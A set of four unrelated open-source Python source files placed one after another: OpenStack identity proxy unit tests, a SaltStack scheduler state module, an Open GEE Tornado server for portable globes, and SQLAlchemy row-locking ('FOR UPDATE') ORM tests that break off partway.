from openstack.identity.v3 import policy
from openstack.identity.v3 import project
from openstack.identity.v3 import region
from openstack.identity.v3 import role
from openstack.identity.v3 import service
from openstack.identity.v3 import trust
from openstack.identity.v3 import user
from openstack.tests.unit import test_proxy_base2
class TestIdentityProxy(test_proxy_base2.TestProxyBase):
def setUp(self):
super(TestIdentityProxy, self).setUp()
self.proxy = _proxy.Proxy(self.session)
def test_credential_create_attrs(self):
self.verify_create(self.proxy.create_credential,
credential.Credential)
def test_credential_delete(self):
self.verify_delete(self.proxy.delete_credential,
credential.Credential, False)
def test_credential_delete_ignore(self):
self.verify_delete(self.proxy.delete_credential,
credential.Credential, True)
def test_credential_find(self):
self.verify_find(self.proxy.find_credential, credential.Credential)
def test_credential_get(self):
self.verify_get(self.proxy.get_credential, credential.Credential)
def test_credentials(self):
self.verify_list(self.proxy.credentials, credential.Credential,
paginated=False)
def test_credential_update(self):
self.verify_update(self.proxy.update_credential, credential.Credential)
def test_domain_create_attrs(self):
self.verify_create(self.proxy.create_domain, domain.Domain)
def test_domain_delete(self):
self.verify_delete(self.proxy.delete_domain, domain.Domain, False)
def test_domain_delete_ignore(self):
self.verify_delete(self.proxy.delete_domain, domain.Domain, True)
def test_domain_find(self):
self.verify_find(self.proxy.find_domain, domain.Domain)
def test_domain_get(self):
self.verify_get(self.proxy.get_domain, domain.Domain)
def test_domains(self):
self.verify_list(self.proxy.domains, domain.Domain, paginated=False)
def test_domain_update(self):
self.verify_update(self.proxy.update_domain, domain.Domain)
def test_endpoint_create_attrs(self):
self.verify_create(self.proxy.create_endpoint, endpoint.Endpoint)
def test_endpoint_delete(self):
self.verify_delete(self.proxy.delete_endpoint,
endpoint.Endpoint, False)
def test_endpoint_delete_ignore(self):
self.verify_delete(self.proxy.delete_endpoint,
endpoint.Endpoint, True)
def test_endpoint_find(self):
self.verify_find(self.proxy.find_endpoint, endpoint.Endpoint)
def test_endpoint_get(self):
self.verify_get(self.proxy.get_endpoint, endpoint.Endpoint)
def test_endpoints(self):
self.verify_list(self.proxy.endpoints, endpoint.Endpoint,
paginated=False)
def test_endpoint_update(self):
self.verify_update(self.proxy.update_endpoint, endpoint.Endpoint)
def test_group_create_attrs(self):
self.verify_create(self.proxy.create_group, group.Group)
def test_group_delete(self):
self.verify_delete(self.proxy.delete_group, group.Group, False)
def test_group_delete_ignore(self):
self.verify_delete(self.proxy.delete_group, group.Group, True)
def test_group_find(self):
self.verify_find(self.proxy.find_group, group.Group)
def test_group_get(self):
self.verify_get(self.proxy.get_group, group.Group)
def test_groups(self):
self.verify_list(self.proxy.groups, group.Group, paginated=False)
def test_group_update(self):
self.verify_update(self.proxy.update_group, group.Group)
def test_policy_create_attrs(self):
self.verify_create(self.proxy.create_policy, policy.Policy)
def test_policy_delete(self):
self.verify_delete(self.proxy.delete_policy, policy.Policy, False)
def test_policy_delete_ignore(self):
self.verify_delete(self.proxy.delete_policy, policy.Policy, True)
def test_policy_find(self):
self.verify_find(self.proxy.find_policy, policy.Policy)
def test_policy_get(self):
self.verify_get(self.proxy.get_policy, policy.Policy)
def test_policies(self):
self.verify_list(self.proxy.policies, policy.Policy, paginated=False)
def test_policy_update(self):
self.verify_update(self.proxy.update_policy, policy.Policy)
def test_project_create_attrs(self):
self.verify_create(self.proxy.create_project, project.Project)
def test_project_delete(self):
self.verify_delete(self.proxy.delete_project, project.Project, False)
def test_project_delete_ignore(self):
self.verify_delete(self.proxy.delete_project, project.Project, True)
def test_project_find(self):
self.verify_find(self.proxy.find_project, project.Project)
def test_project_get(self):
self.verify_get(self.proxy.get_project, project.Project)
def test_projects(self):
self.verify_list(self.proxy.projects, project.Project, paginated=False)
def test_project_update(self):
self.verify_update(self.proxy.update_project, project.Project)
def test_service_create_attrs(self):
self.verify_create(self.proxy.create_service, service.Service)
def test_service_delete(self):
self.verify_delete(self.proxy.delete_service, service.Service, False)
def test_service_delete_ignore(self):
self.verify_delete(self.proxy.delete_service, service.Service, True)
def test_service_find(self):
self.verify_find(self.proxy.find_service, service.Service)
def test_service_get(self):
self.verify_get(self.proxy.get_service, service.Service)
def test_services(self):
self.verify_list(self.proxy.services, service.Service, paginated=False)
def test_service_update(self):
self.verify_update(self.proxy.update_service, service.Service)
def test_user_create_attrs(self):
self.verify_create(self.proxy.create_user, user.User)
def test_user_delete(self):
self.verify_delete(self.proxy.delete_user, user.User, False)
def test_user_delete_ignore(self):
self.verify_delete(self.proxy.delete_user, user.User, True)
def test_user_find(self):
self.verify_find(self.proxy.find_user, user.User)
def test_user_get(self):
self.verify_get(self.proxy.get_user, user.User)
def test_users(self):
self.verify_list(self.proxy.users, user.User, paginated=False)
def test_user_update(self):
self.verify_update(self.proxy.update_user, user.User)
def test_trust_create_attrs(self):
self.verify_create(self.proxy.create_trust, trust.Trust)
def test_trust_delete(self):
self.verify_delete(self.proxy.delete_trust, trust.Trust, False)
def test_trust_delete_ignore(self):
self.verify_delete(self.proxy.delete_trust, trust.Trust, True)
def test_trust_find(self):
self.verify_find(self.proxy.find_trust, trust.Trust)
def test_trust_get(self):
self.verify_get(self.proxy.get_trust, trust.Trust)
def test_trusts(self):
self.verify_list(self.proxy.trusts, trust.Trust, paginated=False)
def test_region_create_attrs(self):
self.verify_create(self.proxy.create_region, region.Region)
def test_region_delete(self):
self.verify_delete(self.proxy.delete_region, region.Region, False)
def test_region_delete_ignore(self):
self.verify_delete(self.proxy.delete_region, region.Region, True)
def test_region_find(self):
self.verify_find(self.proxy.find_region, region.Region)
def test_region_get(self):
self.verify_get(self.proxy.get_region, region.Region)
def test_regions(self):
self.verify_list(self.proxy.regions, region.Region, paginated=False)
def test_region_update(self):
self.verify_update(self.proxy.update_region, region.Region)
def test_role_create_attrs(self):
self.verify_create(self.proxy.create_role, role.Role)
def test_role_delete(self):
self.verify_delete(self.proxy.delete_role, role.Role, False)
def test_role_delete_ignore(self):
self.verify_delete(self.proxy.delete_role, role.Role, True)
def test_role_find(self):
self.verify_find(self.proxy.find_role, role.Role)
def test_role_get(self):
self.verify_get(self.proxy.get_role, role.Role)
def test_roles(self):
self.verify_list(self.proxy.roles, role.Role, paginated=False)
def test_role_update(self):
self.verify_update(self.proxy.update_role, role.Role)
|
|
"""
Management of the Salt scheduler
==============================================
.. code-block:: yaml
job3:
schedule.present:
- function: test.ping
- seconds: 3600
- splay: 10
This will schedule the command: test.ping every 3600 seconds
(every hour) splaying the time between 0 and 10 seconds
job2:
schedule.present:
- function: test.ping
- seconds: 15
- splay:
start: 10
end: 20
This will schedule the command: test.ping every 15 seconds
splaying the time between 10 and 20 seconds
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- when:
- Monday 5:00pm
- Tuesday 3:00pm
- Wednesday 5:00pm
- Thursday 3:00pm
- Friday 5:00pm
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday. Requires that
python-dateutil is installed on the minion.
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- cron: '*/5 * * * *'
Scheduled jobs can also be specified using the format used by cron. This will
schedule the command: state.sls httpd test=True to run every 5 minutes. Requires
that python-croniter is installed on the minion.
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- when:
- Monday 5:00pm
- Tuesday 3:00pm
- Wednesday 5:00pm
- Thursday 3:00pm
- Friday 5:00pm
- returner: xmpp
- return_config: xmpp_state_run
- return_kwargs:
recipient: [email protected]
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday. Using the xmpp returner
to return the results of the scheduled job, with the alternative configuration
options found in the xmpp_state_run section.
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- hours: 1
- skip_during_range:
- start: 2pm
- end: 3pm
- run_after_skip_range: True
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday. Requires that
python-dateutil is installed on the minion.
"""
def present(name, **kwargs):
"""
Ensure a job is present in the schedule
name
The unique name that is given to the scheduled job.
seconds
The scheduled job will be executed after the specified
number of seconds have passed.
minutes
The scheduled job will be executed after the specified
number of minutes have passed.
hours
The scheduled job will be executed after the specified
number of hours have passed.
days
The scheduled job will be executed after the specified
number of days have passed.
when
This will schedule the job at the specified time(s).
The when parameter must be a single value or a dictionary
with the date string(s) using the dateutil format.
Requires python-dateutil.
cron
This will schedule the job at the specified time(s)
using the crontab format.
Requires python-croniter.
run_on_start
Whether the job will run when Salt minion starts, or the job will be
skipped **once** and run at the next scheduled run. Value should be a
boolean.
function
The function that should be executed by the scheduled job.
job_args
The arguments that will be used by the scheduled job.
job_kwargs
The keyword arguments that will be used by the scheduled job.
maxrunning
Ensure that there are no more than N copies of a particular job running.
jid_include
Include the job into the job cache.
splay
The amount of time in seconds to splay a scheduled job.
Can be specified as a single value in seconds or as a dictionary
range with 'start' and 'end' values.
range
This will schedule the command within the range specified.
The range parameter must be a dictionary with the date strings
using the dateutil format. Requires python-dateutil.
once
This will schedule a job to run once on the specified date.
once_fmt
The default date format is ISO 8601 but can be overridden by
also specifying the ``once_fmt`` option.
enabled
Whether the job should be enabled or disabled. Value should be a boolean.
return_job
Whether to return information to the Salt master upon job completion.
metadata
Using the metadata parameter special values can be associated with
a scheduled job. These values are not used in the execution of the job,
but can be used to search for specific jobs later if combined with the
return_job parameter. The metadata parameter must be specified as a
dictionary, othewise it will be ignored.
returner
The returner to use to return the results of the scheduled job.
return_config
The alternative configuration to use for returner configuration options.
return_kwargs
Any individual returner configuration items to override. Should be passed
as a dictionary.
persist
Whether the job should persist between minion restarts, defaults to True.
skip_during_range
This will ensure that the scheduled command does not run within the
range specified. The range parameter must be a dictionary with the
date strings using the dateutil format. Requires python-dateutil.
run_after_skip_range
Whether the job should run immediately after the skip_during_range time
period ends.
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
new_item = __salt__["schedule.build_schedule_item"](name, **kwargs)
# See if the new_item is valid
if isinstance(new_item, dict):
if "result" in new_item and not new_item["result"]:
ret["result"] = new_item["result"]
ret["comment"] = new_item["comment"]
return ret
# The schedule.list gives us an item that is guaranteed to have an
# 'enabled' argument. Before comparing, add 'enabled' if it's not
# available (assume True, like schedule.list does)
if "enabled" not in new_item:
new_item["enabled"] = True
if new_item == current_schedule[name]:
ret["comment"].append("Job {} in correct state".format(name))
else:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.modify"](name, **kwargs)
ret["comment"].append(result["comment"])
ret["changes"] = result["changes"]
else:
result = __salt__["schedule.modify"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Modifying job {} in schedule".format(name))
ret["changes"] = result["changes"]
else:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.add"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.add"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Adding new job {} to schedule".format(name))
ret["changes"] = result["changes"]
ret["comment"] = "\n".join(ret["comment"])
return ret
def absent(name, **kwargs):
"""
Ensure a job is absent from the schedule
name
The unique name that is given to the scheduled job.
persist
Whether the job should persist between minion restarts, defaults to True.
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.delete"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.delete"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Removed job {} from schedule".format(name))
ret["changes"] = result["changes"]
else:
ret["comment"].append("Job {} not present in schedule".format(name))
ret["comment"] = "\n".join(ret["comment"])
return ret
def enabled(name, **kwargs):
"""
Ensure a job is enabled in the schedule
name
The unique name that is given to the scheduled job.
persist
Whether the job should persist between minion restarts, defaults to True.
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.enable_job"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.enable_job"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["changes"] = result["changes"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Enabled job {} from schedule".format(name))
else:
ret["comment"].append("Job {} not present in schedule".format(name))
ret["comment"] = "\n".join(ret["comment"])
return ret
def disabled(name, **kwargs):
"""
Ensure a job is disabled in the schedule
name
The unique name that is given to the scheduled job.
persist
Whether the job should persist between minion restarts, defaults to True.
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.disable_job"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.disable_job"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Disabled job {} from schedule".format(name))
else:
ret["comment"].append("Job {} not present in schedule".format(name))
ret["comment"] = "\n".join(ret["comment"])
return ret
|
|
#!/usr/bin/env python2.7
#
# Copyright 2017 Google Inc, 2019 Open GEE Contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Serves a specified globe to Google Earth EC.
Google Earth EC can be running on the same machine
or can be accessing this server through a proxy servers
sharing the same key.
"""
import tornado.httpserver
import tornado.ioloop
import tornado.web
import local_server
import portable_globe
import portable_server_base
import portable_web_interface
from platform_specific_functions import prepare_for_io_loop
class FlatFileHandler(portable_server_base.BaseHandler):
"""Class for handling flatfile requests."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for packets."""
argument_str = self.request.uri.split("?")[1]
arguments = argument_str.split("-")
if arguments[0] == "lf":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "application/octet-stream")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalFlatFileHandler(
self, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalFlatFileHandler(
self, portable_globe.NON_COMPOSITE_LAYER)
self.finish()
class CompositeFlatFileHandler(portable_server_base.BaseHandler):
"""Class for handling flatfile requests to glc layers."""
@tornado.web.asynchronous
def get(self, layer_id):
"""Handle GET request for packets."""
argument_str = self.request.uri.split("?")[1]
arguments = argument_str.split("-")
if arguments[0] == "lf":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "application/octet-stream")
tornado.web.local_server_.LocalFlatFileHandler(self, int(layer_id))
self.finish()
class DbRootHandler(portable_server_base.BaseHandler):
"""Class for returning the dbRoot."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for the dbroot."""
self.set_header("Content-Type", "application/octet-stream")
if not tornado.web.globe_.Is3d():
print "Bad request: dbRoot from non-3D globe."
else:
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalDbRootHandler(
self, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalDbRootHandler(
self, portable_globe.NON_COMPOSITE_LAYER)
self.finish()
class CompositeDbRootHandler(portable_server_base.BaseHandler):
"""Class for returning the meta dbRoot of a glc or dbRoots of its layers."""
@tornado.web.asynchronous
def get(self, layer_id):
"""Handle GET request for the dbroot."""
self.set_header("Content-Type", "application/octet-stream")
if not tornado.web.globe_.Is3d():
print "Bad request: dbRoot from non-3D globe."
elif not tornado.web.globe_.IsComposite():
print "Bad request: composite request for glb."
else:
tornado.web.local_server_.LocalDbRootHandler(self, int(layer_id))
self.finish()
class CompositeVectorLayerHandler(portable_server_base.BaseHandler):
"""Class for returning vector layer data."""
@tornado.web.asynchronous
def get(self, layer_id, path):
"""Handle GET request for vector layer data."""
path = path.encode("ascii", "ignore")
self.set_header("Content-Type", "text/html")
if not tornado.web.globe_.IsComposite():
print "Bad request: composite request for glb."
else:
tornado.web.local_server_.LocalLayerVectorFileHandler(
self, path, int(layer_id))
self.finish()
class DocsHandler(portable_server_base.BaseHandler):
"""Class for returning the content of files directly from disk."""
@tornado.web.asynchronous
def get(self, path):
"""Handle GET request for some document.
For example it is used for javascript files for
the Google Earth web browser plugin.
Args:
path: Path to file to be returned.
"""
path = path.encode("ascii", "ignore")
if path[-3:].lower() == "gif":
self.set_header("Content-Type", "image/gif")
elif path[-3:].lower() == "png":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "text/html")
tornado.web.local_server_.LocalDocsHandler(self, path)
self.finish()
class CompositeDocsHandler(portable_server_base.BaseHandler):
"""Class for returning the content of files directly from disk."""
@tornado.web.asynchronous
def get(self, layer_id, path):
"""Handle GET request for some document.
For example it is used for javascript files for
the Google Earth web browser plugin.
Args:
layer_id: Id of layer within the composite.
path: Path to file to be returned.
"""
path = path.encode("ascii", "ignore")
if path[-3:].lower() == "gif":
self.set_header("Content-Type", "image/gif")
elif path[-3:].lower() == "png":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "text/html")
tornado.web.local_server_.LocalLayerDocsHandler(
self, path, int(layer_id))
self.finish()
class BalloonHandler(portable_server_base.BaseHandler):
"""Class for returning the content for a balloon."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for FT balloon data."""
self.set_header("Content-Type", "text/html")
ftid = self.request.arguments["ftid"][0].replace(":", "-")
path = "earth/vector_layer/balloon_%s.html" % ftid
tornado.web.local_server_.LocalDocsHandler(self, path)
self.finish()
class IconHandler(FlatFileHandler):
"""Class for returning icons."""
@tornado.web.asynchronous
def get(self, icon):
"""Handle GET request for icon."""
icon = icon.encode("ascii", "ignore")
self.set_header("Content-Type", "image/png")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalIconHandler(
self, icon, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalIconHandler(
self, icon, portable_globe.NON_COMPOSITE_LAYER)
self.finish()
class CompositeIconHandler(FlatFileHandler):
"""Class for returning icons."""
@tornado.web.asynchronous
def get(self, icon, layer_id):
"""Handle GET request for icon."""
icon = icon.encode("ascii", "ignore")
self.set_header("Content-Type", "image/png")
tornado.web.local_server_.LocalIconHandler(self, icon, int(layer_id))
self.finish()
class KmlSearchHandler(portable_server_base.BaseHandler):
"""Class for returning search results as kml."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for kml search results."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalKmlSearchHandler(self)
self.finish()
class JsonSearchHandler(portable_server_base.BaseHandler):
"""Class for returning search results as json."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for json search results."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalJsonSearchHandler(self)
self.finish()
class CompositeQueryHandler(portable_server_base.BaseHandler):
"""Class for handling "query" requests."""
@tornado.web.asynchronous
def get(self, layer_id):
"""Handle GET request for JSON file for plugin."""
if self.request.arguments["request"][0] == "Json":
self.set_header("Content-Type", "text/plain; charset=utf-8")
if ("is2d" in self.request.arguments.keys() and
self.request.arguments["is2d"][0] == "t"):
tornado.web.local_server_.LocalJsonHandler(self, True)
else:
tornado.web.local_server_.LocalJsonHandler(self, False)
elif self.request.arguments["request"][0] == "ImageryMaps":
if tornado.web.globe_.IsMbtiles():
self.set_header("Content-Type", "image/png")
tornado.web.local_server_.LocalMapTileHandler(
self, True, portable_globe.COMPOSITE_BASE_LAYER)
else:
self.set_header("Content-Type", "image/jpeg")
tornado.web.local_server_.LocalMapTileHandler(
self, True, int(layer_id))
elif self.request.arguments["request"][0] == "VectorMapsRaster":
self.set_header("Content-Type", "image/png")
tornado.web.local_server_.LocalMapTileHandler(
self, False, int(layer_id))
elif self.request.arguments["request"][0] == "Icon":
self.set_header("Content-Type", "image/png")
(icon_path, use_layer, use_local) = (
tornado.web.local_server_.ConvertIconPath(
self.request.arguments["icon_path"][0]))
layer_id = int(layer_id)
if not use_layer:
layer_id = portable_globe.NON_COMPOSITE_LAYER
tornado.web.local_server_.LocalIconHandler(
self, icon_path, layer_id, use_local)
else:
self.set_header("Content-Type", "text/plain")
print "Unknown query request: ", self.request.uri
self.finish()
class QueryHandler(portable_server_base.BaseHandler):
"""Class for handling "query" requests."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for JSON file for plugin."""
if self.request.arguments["request"][0] == "Json":
if "v" in self.request.arguments:
json_version = int(self.request.arguments["v"][0])
else:
json_version = 1
self.set_header("Content-Type", "text/plain; charset=utf-8")
# TODO: Need way to distinguish 2d/3d for
# TODO: composite with both.
if ("is2d" in self.request.arguments.keys() and
self.request.arguments["is2d"][0] == "t"):
tornado.web.local_server_.LocalJsonHandler(self, True, json_version)
else:
tornado.web.local_server_.LocalJsonHandler(self, False, json_version)
elif self.request.arguments["request"][0] == "ImageryMaps":
self.set_header("Content-Type", "image/jpeg")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalMapTileHandler(
self, True, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalMapTileHandler(
self, True, portable_globe.NON_COMPOSITE_LAYER)
elif self.request.arguments["request"][0] == "VectorMapsRaster":
self.set_header("Content-Type", "image/png")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalMapTileHandler(
self, False, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalMapTileHandler(
self, False, portable_globe.NON_COMPOSITE_LAYER)
elif self.request.arguments["request"][0] == "Icon":
self.set_header("Content-Type", "image/png")
if tornado.web.globe_.IsComposite():
(icon_path, use_layer, use_local) = (
tornado.web.local_server_.ConvertIconPath(
self.request.arguments["icon_path"][0]))
if use_layer:
layer_id = portable_globe.COMPOSITE_BASE_LAYER
else:
layer_id = portable_globe.NON_COMPOSITE_LAYER
tornado.web.local_server_.LocalIconHandler(
self, icon_path, layer_id, use_local)
else:
tornado.web.local_server_.LocalIconHandler(
# Strips off "icons/" prefix from the path
self, self.request.arguments["icon_path"][0][6:],
portable_globe.NON_COMPOSITE_LAYER)
else:
self.set_header("Content-Type", "text/plain")
print "Unknown query request: ", self.request.uri
self.finish()
class MapsGen204Handler(portable_server_base.BaseHandler):
"""Class for handling /maps/gen_204 request."""
def get(self):
"""Handle GET request for gen_204 request."""
self.set_header("Content-Type", "text/plain")
# TODO: Consider parsing and storing Maps API usage.
self.finish()
class PingHandler(portable_server_base.BaseHandler):
"""Class for handling ping request to check if server is up."""
def get(self):
"""Handle GET request for ping."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalPingHandler(self)
self.finish()
class InfoHandler(portable_server_base.BaseHandler):
"""Class for getting information about current globe."""
def get(self):
"""Handle GET request for unknown path."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalInfoHandler(self)
self.finish()
def main():
"""Main for portable server."""
application = tornado.web.Application([
# Important to look for local requests first.
(r"/local/(.*)", portable_server_base.LocalDocsHandler),
(r"/ext/(.*)", portable_server_base.ExtHandler),
(r".*/(\d+)/kh/flatfile/lf-(.*)", CompositeIconHandler),
(r".*/(\d+)/kh/flatfile", CompositeFlatFileHandler),
(r".*/(\d+)/kh/dbRoot.*", CompositeDbRootHandler),
(r".*/(\d+)/kmllayer/(.*)", CompositeVectorLayerHandler),
(r".*/flatfile/lf-(.*)", IconHandler),
(r".*/flatfile", FlatFileHandler),
(r".*/dbRoot.*", DbRootHandler),
(r".*/MapsAdapter", JsonSearchHandler),
(r".*/ECV4Adapter", KmlSearchHandler),
(r".*/Portable2dPoiSearch", JsonSearchHandler),
(r".*/Portable3dPoiSearch", KmlSearchHandler),
(r".*/icons/(.*)", IconHandler),
(r"/ping", PingHandler),
(r"/info", InfoHandler),
(r".*/(\d+)/query", CompositeQueryHandler),
(r".*/query", QueryHandler),
(r".*/(\d+)/(js/.*)", CompositeDocsHandler),
(r".*/(\d+)/(kml/.*)", CompositeDocsHandler),
(r".*/(\d+)/(license/.*)", CompositeDocsHandler),
(r".*/(\d+)/(earth/.*)", CompositeDocsHandler),
(r".*/(\d+)/(maps/.*)", CompositeDocsHandler),
(r".*/(js/.*)", DocsHandler),
(r".*/(kml/.*)", DocsHandler),
(r".*/(license/.*)", DocsHandler),
(r".*/(earth/.*)", DocsHandler),
(r"/maps/gen_204", MapsGen204Handler),
(r".*/(maps/.*)", DocsHandler),
(r"/eb_balloon", BalloonHandler),
(r"/(.*)", portable_web_interface.SetUpHandler),
])
prepare_for_io_loop()
tornado.web.globe_ = portable_globe.Globe()
tornado.web.local_server_ = local_server.LocalServer()
http_server = tornado.httpserver.HTTPServer(application)
if tornado.web.globe_.config_.DisableBroadcasting():
http_server.listen(tornado.web.globe_.Port(), address="127.0.0.1")
else:
http_server.listen(tornado.web.globe_.Port())
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
|
from sqlalchemy import exc
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import mapper
from sqlalchemy.orm import relationship
from sqlalchemy.orm import Session
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import eq_
from test.orm import _fixtures
class ForUpdateTest(_fixtures.FixtureTest):
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
mapper(User, users)
def _assert(
self,
read=False,
nowait=False,
of=None,
key_share=None,
assert_q_of=None,
assert_sel_of=None,
):
User = self.classes.User
s = Session()
q = s.query(User).with_for_update(
read=read, nowait=nowait, of=of, key_share=key_share
)
sel = q._compile_context().statement
assert q._for_update_arg.read is read
assert sel._for_update_arg.read is read
assert q._for_update_arg.nowait is nowait
assert sel._for_update_arg.nowait is nowait
assert q._for_update_arg.key_share is key_share
assert sel._for_update_arg.key_share is key_share
eq_(q._for_update_arg.of, assert_q_of)
eq_(sel._for_update_arg.of, assert_sel_of)
def test_key_share(self):
self._assert(key_share=True)
def test_read(self):
self._assert(read=True)
def test_plain(self):
self._assert()
def test_nowait(self):
self._assert(nowait=True)
def test_of_single_col(self):
User, users = self.classes.User, self.tables.users
self._assert(
of=User.id, assert_q_of=[users.c.id], assert_sel_of=[users.c.id]
)
class BackendTest(_fixtures.FixtureTest):
__backend__ = True
# test against the major backends. We are naming specific databases
# here rather than using requirements rules since the behavior of
# "FOR UPDATE" as well as "OF" is very specific to each DB, and we need
# to run the query differently based on backend.
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
Address, addresses = cls.classes.Address, cls.tables.addresses
mapper(User, users, properties={"addresses": relationship(Address)})
mapper(Address, addresses)
def test_inner_joinedload_w_limit(self):
User = self.classes.User
sess = Session()
q = (
sess.query(User)
.options(joinedload(User.addresses, innerjoin=True))
.with_for_update()
.limit(1)
)
if testing.against("oracle"):
assert_raises_message(exc.DatabaseError, "ORA-02014", q.all)
else:
q.all()
sess.close()
def test_inner_joinedload_wo_limit(self):
User = self.classes.User
sess = Session()
sess.query(User).options(
joinedload(User.addresses, innerjoin=True)
).with_for_update().all()
sess.close()
def test_outer_joinedload_w_limit(self):
User = self.classes.User
sess = Session()
q = sess.query(User).options(
joinedload(User.addresses, innerjoin=False)
)
if testing.against("postgresql"):
q = q.with_for_update(of=User)
else:
q = q.with_for_update()
q = q.limit(1)
if testing.against("oracle"):
assert_raises_message(exc.DatabaseError, "ORA-02014", q.all)
else:
q.all()
sess.close()
def test_outer_joinedload_wo_limit(self):
User = self.classes.User
sess = Session()
q = sess.query(User).options(
joinedload(User.addresses, innerjoin=False)
)
if testing.against("postgresql"):
q = q.with_for_update(of=User)
else:
q = q.with_for_update()
q.all()
sess.close()
def test_join_w_subquery(self):
User = self.classes.User
Address = self.classes.Address
sess = Session()
q1 = sess.query(User).with_for_update().subquery()
sess.query(q1).join(Address).all()
sess.close()
def test_plain(self):
User = self.classes.User
sess = Session()
sess.query(User).with_for_update().all()
sess.close()
class CompileTest(_fixtures.FixtureTest, AssertsCompiledSQL):
"""run some compile tests, even though these are redundant."""
run_inserts = None
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
Address, addresses = cls.classes.Address, cls.tables.addresses
mapper(User, users, properties={"addresses": relationship(Address)})
mapper(Address, addresses)
def test_default_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect=default.DefaultDialect(),
)
def test_not_supported_by_dialect_should_just_use_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect=default.DefaultDialect(),
)
def test_postgres_read(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True),
"SELECT users.id AS users_id FROM users FOR SHARE",
dialect="postgresql",
)
def test_postgres_read_nowait(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True, nowait=True),
